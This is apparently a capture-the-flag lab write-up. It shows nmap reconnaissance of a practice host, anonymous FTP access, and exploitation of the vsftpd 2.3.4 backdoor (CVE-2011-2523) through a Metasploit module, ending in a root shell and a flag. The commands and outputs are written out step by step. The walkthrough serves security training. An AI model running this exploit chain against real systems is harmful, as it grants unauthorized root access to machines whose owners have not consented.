We first begin by performing an nmap scan to determine what ports are open and what services are running behind them.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
➜ nmap -sC -sV -p- -T4 10.150.150.12
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-21 19:23 E. Africa Standard Time
Nmap scan report for 10.150.150.12
Host is up (0.16s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.66.67.174
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 1f:bc:e3:e3:5b:eb:ff:b2:30:a7:4c:33:11:bf:67:a3 (RSA)
| 256 c8:e4:18:29:59:d0:4e:ea:dc:05:50:bc:d5:6f:e5:00 (ECDSA)
|_ 256 58:d5:70:6d:0d:80:71:0a:ba:8e:1c:7a:c7:37:2f:e2 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.20 seconds
From our nmap scan, we found FTP to be open and allowing Anonymous login. Accessing FTP as anonymous, we dont see any files that we can download. Trying to upload a file didn’t work as well.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
➜ ftp 10.150.150.12
Connected to 10.150.150.12.
220 Through the portal... - into nothingness or bliss?
Name (10.150.150.12:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||30941|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Nov 10 2020 .
drwxr-xr-x 2 0 0 4096 Nov 10 2020 ..
226 Directory send OK.
ftp> exit
221 Goodbye.
vsFTPd has a known backdoor vulnerability, CVE-2011-2523 which opens a shell on port 6200/tcp. Nmap has a script that you can use to test if a machine is vulnerable.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
➜ nmap --script ftp-vsftpd-backdoor -p 21 10.150.150.12
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-21 19:30 E. Africa Standard Time
Nmap scan report for 10.150.150.12
Host is up (0.16s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: BID:48539 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root) groups=0(root)
| References:
| https://www.securityfocus.com/bid/48539
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds
Indeed its vulnerable! We can use a module on metasploit to explloit the vulnerability as shown below:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.150.150.12
RHOSTS => 10.150.150.12
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.150.150.12:21 - Banner: 220 Through the portal... - into nothingness or bliss?
[*] 10.150.150.12:21 - USER: 331 Please specify the password.
[+] 10.150.150.12:21 - Backdoor service has been spawned, handling...
[+] 10.150.150.12:21 - UID: uid=0(root) gid=0(root) groups=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.66.67.174:39693 -> 10.150.150.12:6200 ) at 2022-04-21 06:22:04 -0400
whoami
root
pwd
/root
ls -la
total 44
drwx------ 6 root root 4096 Nov 12 2020 .
drwxr-xr-x 20 root root 4096 Nov 10 2020 ..
-rw------- 1 root root 1429 Apr 21 10:45 .bash_history
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Nov 12 2020 .cache
-rw-r--r-- 1 root root 41 Nov 10 2020 FLAG1.txt
drwxr-xr-x 3 root root 4096 Nov 10 2020 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 66 Nov 10 2020 .selected_editor
drwxr-xr-x 3 root root 4096 Nov 10 2020 snap
drwx------ 2 root root 4096 Nov 10 2020 .ssh
Easy peasy, we got a shell and the FLAG in /root.
Special shout out to the team behind the PTD network: